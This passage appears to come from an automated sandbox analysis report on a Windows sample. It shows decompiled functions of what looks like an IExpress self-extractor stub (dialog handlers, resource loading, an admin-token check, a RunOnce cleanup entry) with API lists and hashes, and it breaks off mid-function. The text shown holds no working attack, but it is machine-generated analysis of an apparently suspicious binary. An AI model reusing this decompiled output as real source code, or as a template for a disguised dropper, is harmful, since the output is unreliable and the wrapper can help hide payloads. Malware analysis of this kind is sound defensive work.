                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                                                            • API String ID: 3027380567-2554356261
                                                                                                                                                                                                                                            • Opcode ID: 4197858169e1d90df518fa0c8b235417d1c4a09d50e0b44feb79c18e8e8e083a
                                                                                                                                                                                                                                            • Instruction ID: 9cce8295ac158c9ae66849c5056c53d267e63c9ef53432beafa04d42e05ec581
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4197858169e1d90df518fa0c8b235417d1c4a09d50e0b44feb79c18e8e8e083a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA31B47DA002186BDB21DB50EC49FEA7B7CEFD5700F0001A9B50DAA051EA75AF89CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                            			E00A43100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            				struct HWND__* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					if( *0xa48590 == 0) {
                                                                                                                                                                                                                                            						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                            						 *0xa48590 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t8 - 1;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                            					EndDialog(_a4, ??);
                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                            				if(_t15 == 0) {
                                                                                                                                                                                                                                            					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t33 = _a4;
                                                                                                                                                                                                                                            					E00A443D0(_t33, _t16);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t33, 0x834,  *0xa48d4c);
                                                                                                                                                                                                                                            					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                                                            					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                            					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                            					 *0xa488b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                            					SetWindowLongA(_t34, 0xfffffffc, E00A430C0);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t15 != 1) {
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a12 != 6) {
                                                                                                                                                                                                                                            					if(_a12 != 7) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            0x00a43108
                                                                                                                                                                                                                                            0x00a4310b
                                                                                                                                                                                                                                            0x00a431b7
                                                                                                                                                                                                                                            0x00a431ca
                                                                                                                                                                                                                                            0x00a431d0
                                                                                                                                                                                                                                            0x00a431d0
                                                                                                                                                                                                                                            0x00a431da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a431da
                                                                                                                                                                                                                                            0x00a43111
                                                                                                                                                                                                                                            0x00a43114
                                                                                                                                                                                                                                            0x00a43136
                                                                                                                                                                                                                                            0x00a43136
                                                                                                                                                                                                                                            0x00a43138
                                                                                                                                                                                                                                            0x00a4313b
                                                                                                                                                                                                                                            0x00a43141
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43143
                                                                                                                                                                                                                                            0x00a43116
                                                                                                                                                                                                                                            0x00a4311b
                                                                                                                                                                                                                                            0x00a4314b
                                                                                                                                                                                                                                            0x00a43151
                                                                                                                                                                                                                                            0x00a43158
                                                                                                                                                                                                                                            0x00a4316a
                                                                                                                                                                                                                                            0x00a43176
                                                                                                                                                                                                                                            0x00a4317d
                                                                                                                                                                                                                                            0x00a4318b
                                                                                                                                                                                                                                            0x00a4319e
                                                                                                                                                                                                                                            0x00a431a3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a431ad
                                                                                                                                                                                                                                            0x00a43120
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4312a
                                                                                                                                                                                                                                            0x00a43134
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43134
                                                                                                                                                                                                                                            0x00a4312c
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A4313B
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A4314B
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 00A4316A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 00A43176
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00A4317D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 00A43185
                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 00A43190
                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00A430C0), ref: 00A431A3
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A431CA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                            • String ID: cent
                                                                                                                                                                                                                                            • API String ID: 3785188418-3940384054
                                                                                                                                                                                                                                            • Opcode ID: df6ab5ab2d0ec44550471ea157e775b0eb8846aa3117bb971d27f8296e6e3ae4
                                                                                                                                                                                                                                            • Instruction ID: 2d60eeafe91895f2ca478d0b526ac92349be5cd19941b97d537b4ba4b8b3e764
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df6ab5ab2d0ec44550471ea157e775b0eb8846aa3117bb971d27f8296e6e3ae4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E11B43E284251BBEF11DFACAC0CB9A3A64FBDB721F100711F915911E0DBB69642D742
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A4468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				CHAR* _t14;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                                                                                            				_t11 = __edx;
                                                                                                                                                                                                                                            				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                            				_t16 = _t4;
                                                                                                                                                                                                                                            				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                            					if(_t16 == 0) {
                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                            					FreeResource(_t15);
                                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00a44699
                                                                                                                                                                                                                                            0x00a4469b
                                                                                                                                                                                                                                            0x00a446a9
                                                                                                                                                                                                                                            0x00a446af
                                                                                                                                                                                                                                            0x00a446b4
                                                                                                                                                                                                                                            0x00a446bc
                                                                                                                                                                                                                                            0x00a446f9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a446f9
                                                                                                                                                                                                                                            0x00a446d9
                                                                                                                                                                                                                                            0x00a446dd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a446e5
                                                                                                                                                                                                                                            0x00a446ef
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a446f5
                                                                                                                                                                                                                                            0x00a446ff

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: TITLE$cent
                                                                                                                                                                                                                                            • API String ID: 3370778649-3553536280
                                                                                                                                                                                                                                            • Opcode ID: 326f2d5505f4f8c7cd3dcdff1f4d3bddc5266149f9e37d79bc68a212fe6d873e
                                                                                                                                                                                                                                            • Instruction ID: 0268963f2338d3acc74a65a880b2f5cf957b04f3529f2de7741dc48607788b05
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 326f2d5505f4f8c7cd3dcdff1f4d3bddc5266149f9e37d79bc68a212fe6d873e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C501A93E2842107BE3205BE56C4DF6B7E2CDBDFF51F050414FA4997150C9B2884287B6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                                            			E00A417EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t37 = __ecx;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                            					_v20 = _t20;
                                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                                            						 *_t37 = 0;
                                                                                                                                                                                                                                            						_t28 = 1;
                                                                                                                                                                                                                                            						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                            							_t37 = _t39;
                                                                                                                                                                                                                                            							 *0xa4a288(0, _v24, _v28);
                                                                                                                                                                                                                                            							_v20();
                                                                                                                                                                                                                                            							if(_t39 != _t39) {
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							FreeSid(_v24);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t36);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00a417f6
                                                                                                                                                                                                                                            0x00a417fd
                                                                                                                                                                                                                                            0x00a41805
                                                                                                                                                                                                                                            0x00a4180b
                                                                                                                                                                                                                                            0x00a4180d
                                                                                                                                                                                                                                            0x00a41815
                                                                                                                                                                                                                                            0x00a41818
                                                                                                                                                                                                                                            0x00a41820
                                                                                                                                                                                                                                            0x00a41824
                                                                                                                                                                                                                                            0x00a4182c
                                                                                                                                                                                                                                            0x00a41832
                                                                                                                                                                                                                                            0x00a41837
                                                                                                                                                                                                                                            0x00a41851
                                                                                                                                                                                                                                            0x00a41854
                                                                                                                                                                                                                                            0x00a4185d
                                                                                                                                                                                                                                            0x00a41862
                                                                                                                                                                                                                                            0x00a4186c
                                                                                                                                                                                                                                            0x00a41872
                                                                                                                                                                                                                                            0x00a41877
                                                                                                                                                                                                                                            0x00a4187e
                                                                                                                                                                                                                                            0x00a4187e
                                                                                                                                                                                                                                            0x00a41883
                                                                                                                                                                                                                                            0x00a41883
                                                                                                                                                                                                                                            0x00a4185d
                                                                                                                                                                                                                                            0x00a4188a
                                                                                                                                                                                                                                            0x00a4188a
                                                                                                                                                                                                                                            0x00a418a2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A418DD), ref: 00A4181A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A4182C
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(00A418DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A418DD), ref: 00A41855
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,00A418DD), ref: 00A41883
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00A418DD), ref: 00A4188A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                            • Opcode ID: cd1ebb32f32764dac27a85674e0984df8b3eac6836dbe0c6744eea423da2cdf3
                                                                                                                                                                                                                                            • Instruction ID: 0191974d26e96d3df24a553f31a4974ef7f34523b0195de0d147a7049718185e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd1ebb32f32764dac27a85674e0984df8b3eac6836dbe0c6744eea423da2cdf3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6911637DE40209ABDB10DFE4DC49ABEBB78EFC5701F100569F906E2290DB719D458B91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A43450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t7 == 0) {
                                                                                                                                                                                                                                            					EndDialog(_a4, 2);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t24 = _a4;
                                                                                                                                                                                                                                            					E00A443D0(_t24, _t12);
                                                                                                                                                                                                                                            					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t24, 0x838,  *0xa49404);
                                                                                                                                                                                                                                            					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t11 == 1) {
                                                                                                                                                                                                                                            					_t22 = _a12;
                                                                                                                                                                                                                                            					if(_t22 < 6) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 <= 7) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 != 0x839) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa491dc = 1;
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00a43459
                                                                                                                                                                                                                                            0x00a4345c
                                                                                                                                                                                                                                            0x00a434d8
                                                                                                                                                                                                                                            0x00a434de
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a434e0
                                                                                                                                                                                                                                            0x00a4345e
                                                                                                                                                                                                                                            0x00a43463
                                                                                                                                                                                                                                            0x00a4349a
                                                                                                                                                                                                                                            0x00a434a0
                                                                                                                                                                                                                                            0x00a434a7
                                                                                                                                                                                                                                            0x00a434b2
                                                                                                                                                                                                                                            0x00a434c4
                                                                                                                                                                                                                                            0x00a434cb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a434cb
                                                                                                                                                                                                                                            0x00a43468
                                                                                                                                                                                                                                            0x00a4346e
                                                                                                                                                                                                                                            0x00a43474
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4347c
                                                                                                                                                                                                                                            0x00a4348c
                                                                                                                                                                                                                                            0x00a43490
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43496
                                                                                                                                                                                                                                            0x00a43484
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43486
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43486
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A43490
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A4349A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 00A434B2
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000838), ref: 00A434C4
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00A434CB
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000002), ref: 00A434D8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                            • String ID: cent
                                                                                                                                                                                                                                            • API String ID: 852535152-3940384054
                                                                                                                                                                                                                                            • Opcode ID: 8418edbc45efde766cf7314e46f3d1c85dc3cb4e92df9c38a892a7e187d7db19
                                                                                                                                                                                                                                            • Instruction ID: 6dc8fdd778292c6c8fa3b670d0349920f96fd2707c7d06e3a220fe3cf78ba75e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8418edbc45efde766cf7314e46f3d1c85dc3cb4e92df9c38a892a7e187d7db19
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A301B53E280114ABDB569FA9DC0C9EE3A64EFC6712F004110F946869A0C7729F52D785
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A42AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				char _t32;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				char* _t38;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                                            				CHAR* _t59;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t60 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_t65 = _a4;
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t64 = __ecx;
                                                                                                                                                                                                                                            				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                            					GetModuleFileNameA( *0xa49a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_t17 =  *_t64;
                                                                                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                            						 *_t65 =  *_t64;
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t65[1] = _t64[1];
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                            							L19:
                                                                                                                                                                                                                                            							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                            								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                            									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                            										goto L19;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A41680(_t65, E00A417C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            									_t52 = _t65;
                                                                                                                                                                                                                                            									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                            									_t60 = _t14;
                                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                                            										_t32 =  *_t52;
                                                                                                                                                                                                                                            										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                            									} while (_t32 != 0);
